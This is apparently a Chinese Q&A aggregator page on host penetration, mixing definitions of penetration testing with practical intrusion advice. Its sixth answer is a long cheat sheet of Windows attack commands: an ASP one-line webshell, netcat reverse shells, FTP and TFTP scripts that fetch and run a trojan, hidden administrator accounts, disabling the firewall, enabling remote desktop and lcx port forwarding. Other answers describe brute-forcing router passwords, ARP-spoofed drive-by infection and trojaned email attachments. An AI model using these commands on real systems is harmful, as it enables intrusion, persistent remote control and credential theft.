導航:首頁 > IDC知識 > 主機滲透

主機滲透

發布時間:2020-09-17 09:55:35

1、哪款linux系統是用來滲透的

Kali Linux這款系統是用來滲透的 ,它上面的滲透工具非常齊全,大致分為Web滲透(針對網站)、無線滲透(比如滲透WIFI獲得密碼)、主機滲透(就是根據主機漏洞進行滲透,主要用nessus和Metasploit),還可以進行密碼破解,一般都是字典爆破(破passwd哈希、MD5、rar密碼、各種口令),還有社工工具(比較著名的是SET),還有滲透過程中的信息收集方面的工具也很多。

2、通過滲透測試,發現目標主機存在後門木馬漏洞、賬戶安全漏洞、網路SQL注入漏洞怎麼解決

可以安裝一個電腦管家在電腦上
然後打開工具箱,在裡面找到修復漏洞功能
使用這個功能,去修復電腦所有檢測出的高危漏洞即可

3、什麼是網路滲透

網路滲透是攻擊者常用的一種攻擊手段,也是一種綜合的高級攻擊技術,同時網路滲透也是安全工作者所研究的一個課題,在他們口中通常被稱為"滲透測試(Penetration Test)"。

無論是網路滲透(Network Penetration)還是滲透測試(Penetration Test),其實際上所指的都是同一內容,也就是研究如何一步步攻擊入侵某個大型網路主機伺服器群組。

只不過從實施的角度上看,前者是攻擊者的惡意行為,而後者則是安全工作者模擬入侵攻擊測試,進而尋找最佳安全防護方案的正當手段。

(3)主機滲透擴展資料

網路滲透攻擊與普通攻擊的不同:

網路滲透攻擊與普通網路攻擊的不同在於,普通的網路攻擊只是單一類型的攻擊。

例如,在普通的網路攻擊事件中,攻擊者可能僅僅是利用目標網路的Web伺服器漏洞,入侵網站更改網頁,或者在網頁上掛馬。也就是說,這種攻擊是隨機的,而其目的也是單一而簡單的。

網路滲透攻擊則與此不同,它是一種系統漸進型的綜合攻擊方式,其攻擊目標是明確的,攻擊目的往往不那麼單一,危害性也非常嚴重。

例如,攻擊者會有針對性地對某個目標網路進行攻擊,以獲取其內部的商業資料,進行網路破壞等。因此,攻擊者實施攻擊的步驟是非常系統的,假設其獲取了目標網路中網站伺服器的許可權,則不會僅滿足於控制此台伺服器,而是會利用此台伺服器,繼續入侵目標網路,獲取整個網路中所有主機的許可權。

為了實現滲透攻擊,攻擊者採用的攻擊方式絕不僅此於一種簡單的Web腳本漏洞攻擊。攻擊者會綜合運用遠程溢出、木馬攻擊、密碼破解、嗅探、ARP欺騙等多種攻擊方式,逐步控制網路。

總體來說,與普通網路攻擊相比,網路滲透攻擊具有幾個特性:攻擊目的的明確性,攻擊步驟的逐步與漸進性,攻擊手段的多樣性和綜合性。

4、如何對路由器進行滲透

通過路由器入侵這不是入侵,除非網路管理員把管理員把遠程管理路由器;

WEB選項開啟,才可能入侵,還需要知道路由器密碼,登陸目標的的路由器;

將要入侵的ip所有埠進行映射,映射到外網之後在進行入侵;

常用的內網ip分配都是192.168.0.1 或則10.1,或者是192.168.1.1 這樣的Ip段落;

只要能進入路由器WEB管理就能知道對方的內網ip分配情況;

但是進入路由器這關很難, 通過路由器入侵內網,必須有其對外網的IP;

通過各種破解工具破解路由器密碼例如Bruter,Web Cracker等;

都是可以破解路由器密碼的,然後先找出其中一台主機進行滲透;

將肉雞映射到外網後,再掃描掃描出所有網段,然後才通過進一步滲透。

5、網路安全中,入侵和滲透的區別

滲透測試為模擬黑客攻擊測試,但兩者也有區別,滲透測試是「面」的測試,黑客攻擊是「深度」測試。前者講究廣泛度,後者講究破壞性。

6、常用的windows滲透命令有哪些

^echo ^<%eval request(「#」)%^> >C:\wmpub\hkfe666\h4ck.asp
Md hack 創建hack文件夾
本地nc -vv -p -l 埠
伺服器 nc路徑 -e cmd路徑 ip 埠

Rd hack 刪除hack文件夾
Type d:\wwwroot\hack.asp 查看一句話木馬的內容
Del d:\wwwroot\hack.asp 刪除hack.asp
Dir c:\ 查看c盤根目錄全部文件夾和文件信息
Tree e:\ 顯示e盤文件目錄樹
reg query 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp」 /v portnumber
查看終端確定為3389?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server 看看fDenyTSConnections的鍵值是多少?值為0是開,為1是關
netstat -ano 能看到3389開啟?
net stop policyagent
net stop sharedaccess
/c dir d:\freehost\weiquanguang\cnhonker*.* /w/o/s

先net stop sharedacess關閉防火,再net stop PolicyAgent關閉篩選

administrator默認被允許,這種情況下,你需將用戶同時加入「Remote Desktop Users」組。
net user xxx pppp /add &net localgroup administrators xxx /add
net localgroup administrators xxx /add
net localgroup 「Remote Desktop Users」 xxx /add 遠程桌面用戶允許設置。

gpedit.msc

常用系統小命令
gpedit.msc計算機組策略
compmgmt.msc計算機管理
devmgmt.msc設備管理
diskmgmt.msc磁碟管理
fsmgmt.msc共享管理
lusrmgr.ms本地用戶管理
notepad寫字板write
services.msc服務管理

開啟 telnet
@echo off
sc config tlntsvr start= auto
net start telnet

在CMD模式下結束某一進程
一: 通過tasklist 可以查找到相關進程的PID。
語法:tasklist /svc 通過taskkill pid 可以關掉進程。 語法: taskkill /im 進程名 /f
二: ntsd -c q -p PID 可以強行結束運行進程
zxarps.exe -idx 0 -ip 目標的IP -port 80,21,3389 -logfilter 「+post,+user,+pass」
dialupass /allusers /stext 「c:\1.txt」
========================================================
query user 查詢登陸用戶
logoff ID蹬出某用戶
net user 查看所有用戶
c:\xp3389.exe -a
net user 1 1 /add
net1 localgroup administrators 1 /add
C:\>net1 user guest /active:yes 啟用該用戶
=========================================================
whoami 查看全系統許可權
調系統許可權
C:\>c:\windows\system32\cacls.exe c:\windows\system32\net.exe /t /e /g everyone:f
==========================================================
FTP命令行下加賬號的命令;很爽。。。
C:\>ftp
ftp> open 192.168.0.22
ftp> quote site exec net.exe user admin$ jinwei58 /add
ftp> quote site exec net.exe localgroup admin$ /add
200 EXEC command successful (TID=33).
============================================================
ftp傳馬命令
echo open 自己的FTP > cmd.txt
echo 帳戶>> cmd.txt
echo 密碼>> cmd.txt
echo binary >> cmd.txt
echo get 木馬.exe >> cmd.txt
echo bye >> cmd.txt
ftp -s:cmd.txt
木馬.exe
木馬.exe
del cmd.txt. /q
==============================================================
quote site exec net user 用戶名 密碼 /add 添加用戶
quote site exec net localgroup administrators 用戶名 /add
tasklist \svc //shell列進程
==============================================================
sql語句加管理用戶
Select MyCmd(「net user」);
select state(「net user」)
select cmdshell(「net user」)
==============================================================
netstat -an
1.查詢終端開放埠
netstat -an | find 「3389″
================================================================
查詢終端3389埠
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber
================================================================
2.開啟2003終端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
================================================================
3.更改終端埠為2008(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f
=================================================================
4.取消xp&2003系統防火牆對終端服務的限制及IP連接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
=================================================================
5.開啟Win2000的終端 (需重啟)
先將開啟終端的工具上傳到目標主機的c:\
然後執行c:\ver3389.exe等待系統重啟就可以了
=====================================================================
6.解決終端超出了最大連接數的命令
mstsc /v:ip:3389 /console
=====================================================================
關閉防火牆
net stop sharedaccess
======================================================================
先將雙開3389的工具上傳到目標主機下的c:\
然後運行命令 c:\3389.exe
======================================================================
Tasklist/SVC >>c:\3389.txt
=====================================================================
查看adsl
Dialupass.exe /allusers /stext 「c:\1.txt」
=====================================================================
埠映射篇之lcx使用方法
Lcx 命令
本機運行lcx.exe -listen 3001 3002

c:\lcx.exe -slave 61.184.188.125 3001 肉雞的內網IP 3389
C:\recycler\lcx.exe -slave 121.61.225.211 3001 192.170.0.23 3389
在本機連接: 127.0.0.1:3002
=====================================================================
這里是nc的命令說明:
2.nc反彈提權:
伺服器執行: nc位置 -l -p 8080 -t -e cmd位置
監聽本地入棧信息
NC地址 cmd地址
————————————————— -p port 打開本地埠
本地執行: telnet + 伺服器IP地址 + 446
————————————————— -t 以telnet形式應答入棧請求
傳馬命令: tftp -i ip地址 get 木馬名字.exe -e 程序重定向

額外:傳個NC到Webshell上去,反彈個shell,然後用htran轉發埠數據,接著在本地嗅探。
2.降低運行許可權
////////////////////////////
現在本地監聽一個埠。
nc -vv -l -p 8080
最好是80或8080這樣的埠,被防火牆攔截的幾率小很多。
在WebShell運行下面命令連接我們監聽的埠得到CmdShell:
nc -vv IP 8080 -e C:\Documents and Settings\All Users\Documents\cmd.exe
—-===============================================================
1.查詢終端埠

xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber

通用:regedit /e tsp.reg 「HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp」
type tsp.reg

2.開啟XP&2003終端服務
HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber\
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

3.更改終端埠為20008(0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal」 「Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

4.取消xp&2003系統防火牆對終端服務3389埠的限制及IP連接的限制

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 40404:TCP /t REG_SZ /d 40404:TCP:*:Enabled:@xpsp2res.dll,-22009 /f

5.開啟Win2000的終端,埠為3389(需重啟)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo 「Enabled」=」0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo 「ShutdownWithoutLogon」=」0″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo 「EnableAdminTSRemote」=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo 「TSEnabled」=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo 「Start」=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo 「Start」=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo 「Hotkey」=」1″ >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo 「PortNumber」=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo 「PortNumber」=dword:00000D3D >>2000.reg

6.強行重啟Win2000&Win2003系統(執行完最後一條一句後自動重啟)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf

7.禁用TCP/IP埠篩選 (需重啟)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f

8.終端超出最大連接數時可用下面的命令來連接

mstsc /v:ip:3389 /console

9.調整NTFS分區許可權

cacls c: /e /t /g everyone:F (所有人對c盤都有一切權利)

cacls %systemroot%\system32\*.exe /d everyone (拒絕所有人訪問system32中exe文件)
來自文章《windows下面常用的滲透測試命令》

7、我從內網如何滲透外網的主機

內網訪問外網交錢就辦,無所謂滲透。或者說你是某個單位的不讓上網的那種

8、內網個人辦公主機滲透高招幾何?

你們這些一線的未免也太明目張膽了吧,居然問題提到這里來了,ft。
有內網機器,滲透就是體力活。
最簡單有效的就是抓密碼然後逐步擴大范圍,抓密碼的方法多了,不sniffer的話,gina,sam抓回去跑也可以。個人機不好搞的話先搞伺服器。
有0day的話也不妨用用,如果您老人家在吳中路,某小p孩偷來賣給你們的重量級漏洞不用等著發霉么。還有word的現在滿地都是,趕快發啊,非等補丁出來了才用么。
其他還有些奇技淫巧,比如掛馬。一個交換機下面你可以arp欺騙強行掛馬,vs2005不是自動升級的,06年那個跨域的不用白不用(還有個wild的oe)。
郵箱如果控制了更好辦,搶先替換有用的郵件,加個chm或者doc或者mdb的附件,人家看到熟人的信說不定就打開了。
移動設備感染也可以啊,曰先生寫的你們有吧?
……
方法太多了,有上網路問這個問題的時間,說不定都搞下幾台了。要過年了,祝你們多拿獎金。

9、假如電腦主機箱上沾了水,但水沒有滲透進入主機,對主機內的硬體有傷害嗎?

不會有影響的!放心吧!

與主機滲透相關的知識